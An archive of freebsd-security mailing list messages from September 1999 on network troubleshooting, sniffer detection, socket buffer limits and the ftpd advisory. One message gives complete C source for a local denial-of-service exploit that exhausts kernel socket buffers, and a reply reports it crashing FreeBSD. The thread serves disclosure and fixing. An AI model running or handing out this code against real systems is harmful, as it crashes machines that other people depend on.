Subject: Re: ssh disconnects

> We have a situation where a customer gets these FTP slowdowns. He is on
> Pac Bell DSL but has a co-location with us.
> Every time he starts a large
> FTP transfer it goes at full speed but slowly degrades. His colocation is
> running FreeBSD 3.2 and his office computer is Windows 98 with CuteFTP.
>
> Has anyone else seen this?
>
> At 08:20 PM 9/9/99 -0400, you wrote:
> >Nick Hibma wrote:
> > >
> > > Best guess: A firewall is expiring your connection. If you have the
> > > problem that ftp connection go slower and slo-wer and slo-w-e-r after
> > > the first MegaByte, you probably use the same product as our friends
> > > around here.
> > >
> > > Nick
> >
> >The connection does not seem to exhibit any "slow down".
> >It just randomly disconnects.
> >
> >Thanks,
> >--
> >Jim Durham

From owner-freebsd-security Thu Sep 9 21:25:26 1999
Date: Thu, 9 Sep 1999 22:59:24 -0500 (CDT)
From: James Wyatt
To: Mark Newton
Cc: Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC
In-Reply-To: <199909092251.IAA74937@atdot.dotat.org>

On Fri, 10 Sep 1999, Mark Newton wrote:
> James Wyatt wrote:
> > After reading the AntiSniff stuff by the L0pht folks, I'm not so sure. I
> > could send an attack packet to your machine with a forged (or real) return
> > address. When you look-up the hostname in DNS during capture or reporting,
> > I could see (sniff DNS server ENet, hack DNS server, etc) the DNS query
> > and know you saw my packet.
>
> How are you going to do that when I can't transmit any packets?

Maybe *it* can't, but where I've seen these used, there is one or more
card(s) set up in sniff-only mode (snip!), but another card (usually behind
the firewall) to access the machine. If you are looking at the packets on
that or another machine, your package might be nice enough to look-up the
addresses on the packets. If I see the DNS query for it, I know you have
been looking at my attack packets, don't I?

Maybe the sniffing adapter can't transmit, but if there is *any* lookup on
the information received from it, you become *very* visible.

Honest, go read the anti-sniff stuff by L0pht, it is just damn good
thinking about how things really work. Before I read the work, I would
have said some of it was impossible. Now that I have, I can write some of
it. The insight provided was inspirational. - Jy@

From owner-freebsd-security Thu Sep 9 21:55:29 1999
Date: Thu, 9 Sep 1999 23:54:05 -0500 (CDT)
From: David Scheidt
To: James Wyatt
Cc: Mark Newton, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC

On Thu, 9 Sep 1999, James Wyatt wrote:
> On Fri, 10 Sep 1999, Mark Newton wrote:
> > James Wyatt wrote:
> > > After reading the AntiSniff stuff by the L0pht folks, I'm not so sure. I
> > > could send an attack packet to your machine with a forged (or real) return
> > > address. When you look-up the hostname in DNS during capture or reporting,
> > > I could see (sniff DNS server ENet, hack DNS server, etc) the DNS query
> > > and know you saw my packet.
> >
> > How are you going to do that when I can't transmit any packets?
>
> Maybe *it* can't, but where I've seen these used, there is one or more
> card(s) set up in sniff-only mode (snip!), but another card (usually behind
> the firewall) to access the machine. If you are looking at the packets on
> that or another machine, your package might be nice enough to look-up the
> addresses on the packets. If I see the DNS query for it, I know you have
> been looking at my attack packets, don't I?

Which is why the machine doing the sniffing has to do its look ups on a
network that is invisible to any of the machines it's sniffing. That, or
you don't do the lookups on-line.

>
> Maybe the sniffing adapter can't transmit, but if there is *any* lookup on
> the information received from it, you become *very* visible.

Only if the sniffer-sniffer can see your lookups. Some care is in order
in setting things up, clearly. That is true of all security though, so
this shouldn't be a shock.

>
> Honest, go read the anti-sniff stuff by L0pht, it is just damn good
> thinking about how things really work. Before I read the work, I would
> have said some of it was impossible. Now that I have, I can write some of
> it. The insight provided was inspirational. - Jy@
>

Indeed. It is really quite impressive thinking.

David Scheidt

From owner-freebsd-security Thu Sep 9 22:22:48 1999
To: freebsd@gndrsh.dnsmgr.net
Cc: imp@village.org, jwyatt@rwsystems.net, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC
From: sthaug@nethelp.no
In-Reply-To: Your message of "Thu, 9 Sep 1999 12:53:26 -0700 (PDT)"
References: <199909091953.MAA18901@gndrsh.dnsmgr.net>
Date: Fri, 10 Sep 1999 07:20:48 +0200
Message-ID: <28610.936940848@verdi.nethelp.no>

> Can you confirm for me that the link pulses are actually a function of
> the MAU/MII and not the NIC chip. I don't recall seeing anything in any
> NIC chip data sheet that talks about these. I don't have any current
> MAU/MII data sheets.

The link pulses (generation and detection) are a function of the PHY.
See for instance the data sheet for the Intel 82555 PHY from Intel's
Developer site.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Thu Sep 9 23:42:33 1999
Date: Fri, 10 Sep 1999 09:41:54 +0400 (MSD)
From: Stas Kisel
Message-Id: <199909100541.JAA13107@sonet.crimea.ua>
To: jared@puck.nether.net, stas@sonet.crimea.ua
Subject: Re: mbuf shortage situations
Cc: avalon@coombs.anu.edu.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To: <19990909110720.A6694@puck.nether.net>

> From jared@puck.nether.net Thu Sep 9 18:10:06 1999
> I am creating about 100 icmp sockets, and as they are
> created, allocate a very large SO_RCVBUF:
> (void)setsockopt(localstruct->icmp_s, SOL_SOCKET,
> SO_RCVBUF, (char *)&hold, sizeof(hold));

This can be a part of the problem too. setsockopt() has to check if
there is really free memory for the buffer and, if it fails, set the
appropriate errno described in the man page.

In my test, a 2.2.7 kernel allowed me to "allocate" in this way 15M "for
buffers" on a 32M machine (NMBCLUSTERS=1024, maxusers=50). Probably it
could allow more, but I thought 15M was too much anyway. There is a
limitation - a buffer can not be bigger than ~240k.

I did not check which errno setsockopt() returns, but I didn't find
anything appropriate in the man page.

-- 
Stas Kisel. UNIX, security, C, TCP/IP, Web. UNIX - the best adventure game
http://www.tekmetrics.com/transcript.shtml?pid=20053
http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu stas@sonet.crimea.ua ; 2:460/54.4

From owner-freebsd-security Fri Sep 10 4:16:46 1999
From: Zahemszky Gabor
Message-Id: <199909101114.NAA00834@CoDe.hu>
Subject: Re: ssh disconnects
In-Reply-To: <011f01befb35$669b12f0$fd01a8c0@pacbell.net> from John Howie at "Sep 9, 99 07:37:18 pm"
To: freebsd-security@freebsd.org
Date: Fri, 10 Sep 1999 13:13:38 +0200 (CEST)

> There are problems with Windows 95/98/NT protocol stacks that can cause
> this. Check out TechNet at http://www.microsoft.com/technet I can't remember
> the KB Article, sorry...
>
> > We have a situation where a customer gets these FTP slowdowns. He is on
> > Pac Bell DSL but has a co-location with us. Every time he starts a large
> > FTP transfer it goes at full speed but slowly degrades.
His colocation is > > running FreeBSD 3.2 and his office computer is Windows 98 with CuteFTP. > > > > Has anyone else seen this? Well, we had it between 2.2.7 and an OS/2 Warp (3? 4? patches? - cannot remember). We had to change the ethercard to another _type_ (and driver :-) on the os/2 machine. The interesting thing was, ftp was perfect in one way, and incremental slowdown on the other. (we cannot wait an ftp of a 100K file) And yesterday, I've found a similar problem between 3.[12] and W*. local net with 192.168.x.x --- FBSD ed0 192.168.x.y ----------- | | ed1 real IP to BigBadNet | ---------------------- Everything was OK (not perfect, but it's running), the local machines can surf, etc, but ftp from localmachine -> fbsd: one way good, the other way sloow (_not_ slowdown, only slooooower - but we _can_ transfer >M files opposed to the previous problem). The problem was, that natd is running, but! configured to the _wrong_ (ed0) interface. After configuring it to the correct interface, (a messing typo) it's fine. ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? 
]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 5: 7:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay13.jaring.my (relay13.jaring.my [192.228.128.124]) by hub.freebsd.org (Postfix) with ESMTP id AAF2C15DC0 for ; Fri, 10 Sep 1999 05:07:30 -0700 (PDT) (envelope-from itpang@pd.jaring.my) Received: from Sismatik.utm.my ([161.139.68.31]) by relay13.jaring.my (8.8.8/8.8.7) with SMTP id UAA19002 for ; Fri, 10 Sep 1999 20:06:15 +0800 (MYT) Message-ID: <002f01bf11ea$8111a560$1f448ba1@Sismatik.utm.my> From: "Thomson Pang" To: Subject: how to modify packet Date: Sat, 9 Oct 1999 08:09:06 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_002C_01BF122D.8ED957E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Dear

How to modify the packet below to the form 2

      IPv4  |orig IP hdr  |     |      |
            |(any options)| TCP | Data |
            ----------------------------

  (form 2)
            -------------------------------------------------
      IPv4  |orig IP hdr  | ESP |     |      |   ESP   | ESP|
            |(any options)| Hdr | TCP | Data | Trailer |Auth|
            -------------------------------------------------
                                |<----- encrypted ---->|
                          |<------ authenticated ----->|

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 5:12:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay13.jaring.my (relay13.jaring.my [192.228.128.124]) by hub.freebsd.org (Postfix) with ESMTP id AED0515232 for ; Fri, 10 Sep 1999 05:12:43 -0700 (PDT) (envelope-from itpang@pd.jaring.my) Received: from Sismatik.utm.my ([161.139.68.31]) by relay13.jaring.my (8.8.8/8.8.7) with SMTP id UAA19459 for ; Fri, 10 Sep 1999 20:11:32 +0800 (MYT) Message-ID: <003e01bf11eb$3de70400$1f448ba1@Sismatik.utm.my> From: "Thomson Pang" To: Subject: how to modify the packet Date: Sat, 9 Oct 1999 08:14:23 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_003B_01BF122E.4BD04840" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Dear

How to modify the packet below to the form 2

      IPv4  |orig IP hdr  |     |      |
            |(any options)| TCP | Data |
            ----------------------------

  (form 2)
            -------------------------------------------------
      IPv4  |orig IP hdr  | ESP |     |      |   ESP   | ESP|
            |(any options)| Hdr | TCP | Data | Trailer |Auth|
            -------------------------------------------------
                                |<----- encrypted ---->|
                          |<------ authenticated ----->|

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 7:20:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from isiproxy.insolwwb.net (isiproxy.insolwwb.net [208.150.248.1]) by hub.freebsd.org (Postfix) with ESMTP id 723D215836 for ; Fri, 10 Sep 1999 07:20:03 -0700 (PDT) (envelope-from mgrommet@isiar.net) Received: by ISIMAIN with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 08:21:35 -0500 Message-ID: <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> From: Michael Grommet To: "'freebsd-security@freebsd.org'" Subject: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd Date: Thu, 9 Sep 1999 08:20:46 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Am I correct in my assumption that this is _not_ exploitable on the standard ftpd that installs with freebsd 2.2.8 - 3.2 - Stable? Please Advise. 
Mike Grommet Unix Systems Admin mgrommet@insolwwb.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 8:22:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2489C1586C for ; Fri, 10 Sep 1999 08:22:34 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA17473; Fri, 10 Sep 1999 11:11:57 -0400 (EDT) (envelope-from wollman) Date: Fri, 10 Sep 1999 11:11:57 -0400 (EDT) From: Garrett Wollman Message-Id: <199909101511.LAA17473@khavrinen.lcs.mit.edu> To: Stas Kisel Cc: freebsd-security@FreeBSD.ORG Subject: Re: mbuf shortage situations In-Reply-To: <199909100541.JAA13107@sonet.crimea.ua> References: <19990909110720.A6694@puck.nether.net> <199909100541.JAA13107@sonet.crimea.ua> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > There is a limitation - buffer can not be bigger than ~240k. Socket buffers cannot be larger than kernel tunable kern.ipc.maxsockbuf (default 256K). However, the actual memory potentially allocated to the socket buffer is much larger (kern.ipc.maxsockbuf * kern.ipc.sockbuf_waste_factor). -GAWollman -- Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 8:49:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp7.xs4all.nl (smtp7.xs4all.nl [194.109.127.50]) by hub.freebsd.org (Postfix) with ESMTP id 5BC6915D75 for ; Fri, 10 Sep 1999 08:49:01 -0700 (PDT) (envelope-from wdmgds@xs4all.nl) Received: from xs3.xs4all.nl (xs3.xs4all.nl [194.109.6.44]) by smtp7.xs4all.nl (8.9.3/8.9.3) with ESMTP id RAA20360 for ; Fri, 10 Sep 1999 17:48:52 +0200 (CEST) Received: from localhost (wdmgds@localhost) by xs3.xs4all.nl (8.9.0/8.9.0) with ESMTP id RAA02270 for ; Fri, 10 Sep 1999 17:21:27 +0200 (CEST) Date: Fri, 10 Sep 1999 17:21:27 +0200 (CEST) From: wdmgds To: freebsd-security@FreeBSD.ORG Subject: *bsd crashes/freezes/hangs on local user xploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear /etc compile this code snipplet and wheep ... it crashed and mutilated our 227 and 3x boxen.. 
BSDi4 just freezes a couple of seconds, bye
--

#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

#define BUFFERSIZE 204800 /* kiddy var le surgery */

extern int main(void)
{
    int p[2], i;
    char crap[BUFFERSIZE];

    /* Open socket pairs until the kernel refuses another one. Each pair is
       asked for oversized send and receive buffers, made non-blocking and
       written to from both ends; nothing is ever read back or closed. */
    while (1) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
            break;
        i = BUFFERSIZE;
        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        fcntl(p[0], F_SETFL, O_NONBLOCK);
        fcntl(p[1], F_SETFL, O_NONBLOCK);
        write(p[0], crap, BUFFERSIZE);
        write(p[1], crap, BUFFERSIZE);
    }
    exit(0);
}

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 13:57: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id BB5DF14BDD for ; Fri, 10 Sep 1999 13:56:53 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id NAA02205; Fri, 10 Sep 1999 13:55:42 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA15158; Fri, 10 Sep 1999 13:44:57 -0700 Received: from softweyr.com (dyn4.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA26427; Fri, 10 Sep 99 13:55:40 PDT Message-Id: <37D9704C.CE395DC4@softweyr.com> Date: Fri, 10 Sep 1999 14:55:40 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: wdmgds Cc: freebsd-security@FreeBSD.ORG Subject: Re: *bsd crashes/freezes/hangs on local user xploit References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org wdmgds wrote: > > Dear /etc > > 
compile this code snipplet and wheep ... > it crashed and mutilated our 227 and 3x boxen.. > BSDi4 just freezes a couple of seconds, It nailed 3.1-RELEASE on (I think) the 4th trip through the while loop, on the first write. I can't test on my -CURRENT or -STABLE machines, they're both being used at the moment. Nothing about the code looks nefarious. Are we just creaming buffer space in a nasty way? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 17:50: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from tpone.telepac.pt (tpone.telepac.pt [194.65.3.20]) by hub.freebsd.org (Postfix) with ESMTP id D093A15F6E for ; Fri, 10 Sep 1999 17:49:52 -0700 (PDT) (envelope-from jotajustino@mail.telepac.pt) Received: from mail.telepac.pt ([194.65.220.220]) by tpone.telepac.pt (8.8.8+Sun/8.8.8) with SMTP id BAA19069 for FreeBSD-security@freebsd.org; Sat, 11 Sep 1999 01:51:11 +0100 (WET DST) From: jotajustino@mail.telepac.pt Message-Id: <199909110051.BAA19069@tpone.telepac.pt> X-Mailer: MailWorkZ Broadcast 3.0.10 Date: Sáb, 11 Set 1999 01:39:06 +0100 To: Subject: Please don't let Timor people die Reply-To: jotajustino@mail.telepac.pt MIME-Version: 1.0 Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In the referendum promoted by UN 80 % of East Timor people voted for Independence. Since then thousands on people have been killed JUST FOR THEIR VOTE . Almost all international journalists have been forced to leave East Timor ( only four rested ) . United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 ( Pacific time ) , leaving the East Timor people ALONE, against those who are KILLING them. In 3 days more than 300.000 people have been forced to move. 
Indonisian policies and militaries have not been able to keep peace and have no conditions to maitain peace in East Timor. United Nations MUST send a Peace Keeping Force to East Timor. PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. Forward this E-mail or write your own opinion to : secretary General of United Nations mailto:ecu@un.org president of United States of America mailto:president@whitehouse.gov president of China president of French Republic British Prime Miniter President of Russia the Pope or your religious leader your favorite newsgroup, your local senator, your favorite newspaper, your business partners or friends Read your favorite site for news about East Timor, or check the one of the world leaders http://www.cnn.com PS:Thanks, and our apologies for the off topic subject. Any coments can be sent to survey1_pt@hotmail.com at 15h00 GMT+01h00 Portugal will stop please do your share. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 17:55:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from arpa.com (rage.arpa.com [199.245.173.3]) by hub.freebsd.org (Postfix) with ESMTP id 000A714A0D for ; Fri, 10 Sep 1999 17:55:23 -0700 (PDT) (envelope-from jamie@arpa.com) Received: (from jamie@localhost) by arpa.com (8.9.3/8.9.3) id TAA12754; Fri, 10 Sep 1999 19:55:14 -0500 (CDT) Date: Fri, 10 Sep 1999 19:55:14 -0500 From: Jamie Rishaw To: jotajustino@mail.telepac.pt Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: Please don't let Timor people die Message-ID: <19990910195513.A12739@rage.arpa.com> References: <199909110051.BAA19069@tpone.telepac.pt> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199909110051.BAA19069@tpone.telepac.pt>; from jotajustino@mail.telepac.pt on Sat, Sep 11, 1999 at 12:52:34AM +0000 X-Face: d=) RFC_Violation: You saw it here first! 
X-Note: This is my personal e-mail account X-PGP-Fingerprint: <921C135D> C4 48 1B 26 18 7B 1F D9 BA C4 9C 7A B1 07 07 E8 X-No-Archive: Yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How do I configure my kernel for this? On Sat, Sep 11, 1999 at 12:52:34AM +0000, jotajustino@mail.telepac.pt wrote: > > In the referendum promoted by UN 80 % of East Timor people voted for > Independence. Since then thousands on people have been killed > JUST FOR THEIR VOTE . Almost all international journalists have been > forced to leave East Timor ( only four rested ) . > > United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 > ( Pacific time ) , leaving the East Timor people ALONE, against those > who are KILLING them. > > In 3 days more than 300.000 people have been forced to move. > Indonisian policies and militaries have not been able to keep > peace and have no conditions to maitain peace in East Timor. > > United Nations MUST send a Peace Keeping Force to East Timor. > > PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. > > Forward this E-mail or write your own opinion to : > secretary General of United Nations mailto:ecu@un.org > president of United States of America > mailto:president@whitehouse.gov > > president of China > president of French Republic > British Prime Miniter > President of Russia > > the Pope or your religious leader > your favorite newsgroup, > your local senator, > your favorite newspaper, > your business partners or friends > > Read your favorite site for news about East Timor, or check the > one of the world leaders http://www.cnn.com > PS:Thanks, and our apologies for the off topic subject. > Any coments can be sent to survey1_pt@hotmail.com > at 15h00 GMT+01h00 Portugal will stop please do your share. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- _|_ A jamie rishaw is jamie at arpa dot com .. 
So what's the speed of dark? "Shyness is nice, but shyness can stop you from doing all the things in life that you'd like to. So, if there's something you'd like to try.. If there's something you'd like to try ask me - I won't say 'no' - how could I?" //Smiths To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 20:31:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from smyk.apk.net (smyk.apk.net [207.54.158.17]) by hub.freebsd.org (Postfix) with ESMTP id 35EF9152F7 for ; Fri, 10 Sep 1999 20:31:27 -0700 (PDT) (envelope-from stuart@apk.net) Received: from junior.apk.net (stuart@junior.apk.net [207.54.158.20]) by smyk.apk.net (8.9.3/8.9.3/apk.990812+rchk1.22+bspm1.13.1.5) with ESMTP id XAA03228; Fri, 10 Sep 1999 23:24:10 -0400 (EDT) Received: from localhost (stuart@localhost) by junior.apk.net (8.9.3/8.9.3) with ESMTP id XAA14575; Fri, 10 Sep 1999 23:24:06 -0400 (EDT) Date: Fri, 10 Sep 1999 23:24:06 -0400 (EDT) From: Stuart Krivis To: Jamie Rishaw Cc: jotajustino@mail.telepac.pt, FreeBSD-security@FreeBSD.ORG Subject: Re: Please don't let Timor people die In-Reply-To: <19990910195513.A12739@rage.arpa.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 10 Sep 1999, Jamie Rishaw wrote: > How do I configure my kernel for this? Recompile with the --use-holy-water option. > > On Sat, Sep 11, 1999 at 12:52:34AM +0000, jotajustino@mail.telepac.pt wrote: > > > > In the referendum promoted by UN 80 % of East Timor people voted for > > Independence. Since then thousands on people have been killed > > JUST FOR THEIR VOTE . Almost all international journalists have been > > forced to leave East Timor ( only four rested ) . 
> > > > United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 > > ( Pacific time ) , leaving the East Timor people ALONE, against those > > who are KILLING them. > > > > In 3 days more than 300.000 people have been forced to move. > > Indonisian policies and militaries have not been able to keep > > peace and have no conditions to maitain peace in East Timor. > > > > United Nations MUST send a Peace Keeping Force to East Timor. > > > > PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. > > > > Forward this E-mail or write your own opinion to : > > secretary General of United Nations mailto:ecu@un.org > > president of United States of America > > mailto:president@whitehouse.gov > > > > president of China > > president of French Republic > > British Prime Miniter > > President of Russia > > > > the Pope or your religious leader > > your favorite newsgroup, > > your local senator, > > your favorite newspaper, > > your business partners or friends > > > > Read your favorite site for news about East Timor, or check the > > one of the world leaders http://www.cnn.com > > PS:Thanks, and our apologies for the off topic subject. > > Any coments can be sent to survey1_pt@hotmail.com > > at 15h00 GMT+01h00 Portugal will stop please do your share. > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > _|_ > A jamie rishaw is jamie at arpa dot com .. So what's the speed of dark? > > "Shyness is nice, but shyness can stop you from doing all the things in life > that you'd like to. So, if there's something you'd like to try.. If there's > something you'd like to try ask me - I won't say 'no' - how could I?" 
//Smiths > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Stuart Krivis stuart@krivis.com Fourth law of programming: Anything that can go wrong wi sendmail: segmentation violation - core dumped To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 21:19:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id B1DF914C1F for ; Fri, 10 Sep 1999 21:19:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA55382; Fri, 10 Sep 1999 22:19:21 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA12288; Fri, 10 Sep 1999 22:18:30 -0600 (MDT) Message-Id: <199909110418.WAA12288@harmony.village.org> To: Michael Grommet Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBS D-SA-99:03.ftpd Cc: "'freebsd-security@freebsd.org'" In-reply-to: Your message of "Thu, 09 Sep 1999 08:20:46 CDT." <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> References: <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> Date: Fri, 10 Sep 1999 22:18:30 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- In message <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> Michael Grommet writes: : Am I correct in my assumtion that this is _not_ exploitable on the standard : ftpd that installs : with freebsd 2.2.8 - 3.2 - Stable? No. You are not correct to assume that. As far as I know, both of the FTP servers are exploitable, for different reasons. 
Wu-ftpd is exploitable back to the dawn of time, if I read the commentary about wu-ftpd right. Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9nYFdxynu/2qPVhAQGOdgP8DuGSKHQAdypnP8IAq4uA3abAG+LeqnvP sS+VjtS49YicY3cIS/1seafX3GnRCzx641ZOaWJIQHS3JCrg0X4smvArCpw+NAHt +NzEqVi4IFkyMlcNsVr1HKZuPr3w4qRRX+qPGfuxjOwLOBTlJ1EpAwxzsuPMZV5k PpO6bcLG8M0= =vRmm -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 21:20:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A99D2153A5 for ; Fri, 10 Sep 1999 21:20:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA55395; Fri, 10 Sep 1999 22:20:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA12313; Fri, 10 Sep 1999 22:19:32 -0600 (MDT) Message-Id: <199909110419.WAA12313@harmony.village.org> To: wdmgds Subject: Re: *bsd crashes/freezes/hangs on local user xploit Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 10 Sep 1999 17:21:27 +0200." References: Date: Fri, 10 Sep 1999 22:19:32 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message wdmgds writes: : compile this code snipplet and wheep ... : it crashed and mutilated our 227 and 3x boxen.. : BSDi4 just freezes a couple of seconds, Short answer: We're working on it. Longer answer: 